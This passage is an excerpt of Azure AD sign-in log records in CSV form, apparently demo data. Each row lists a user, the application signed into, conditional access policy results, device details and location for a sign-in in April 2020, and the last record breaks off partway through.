+641,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",20e62dc1-35c9-4a85-9bad-dd132f076c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,20e62dc1-35c9-4a85-9bad-dd132f076c00,SigninLogs,Sucess,40.75891113,-73.97901917
+642,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:01.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f58d186e-75a7-4142-8b2b-404b579bab68,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0184cc6e-10a2-4578-80c3-44b6c15b1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,0184cc6e-10a2-4578-80c3-44b6c15b1200,SigninLogs,Sucess,33.7984581,-84.38828278
+643,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:57.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,35a44efc-8b26-4ea4-b1be-08959bb70838,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:43,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",a7357860-c343-460f-ba05-3a7c312f3e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a7357860-c343-460f-ba05-3a7c312f3e00,SigninLogs,Sucess,32.32146072,34.85319901
+644,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,96f72338-ab0c-4cbc-9e5c-f953804bf720,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4aca3199-2681-43b9-9160-589c11b31200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,4aca3199-2681-43b9-9160-589c11b31200,SigninLogs,Sucess,33.7984581,-84.38828278
+645,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:57.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",17d55b14-5a61-48e2-8a43-36855d6d6300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,17d55b14-5a61-48e2-8a43-36855d6d6300,SigninLogs,Sucess,35.01296997,-80.93171692
+646,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:19.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,18a84fc9-15df-4ea6-9a0b-409ef40ce48e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",973ebc26-a5be-4a53-afb2-eb088b951300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,973ebc26-a5be-4a53-afb2-eb088b951300,SigninLogs,Sucess,33.7984581,-84.38828278
+647,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:25.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:34,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c0a3c3a6-4f57-4291-acb6-130b7c754a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0a3c3a6-4f57-4291-acb6-130b7c754a00,SigninLogs,Sucess,32.32146072,34.85319901
+648,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:42.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d1395072-8972-42fb-9171-d62afcde1a82,Microsoft.aadiam,Microsoft.aadiam,,Ely Abramovitch,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:44,"{'operatingSystem': 'Windows 10', 'deviceId': 'c44a422d-5560-4c92-92f8-d48eac67534b', 'browser': 'Chrome 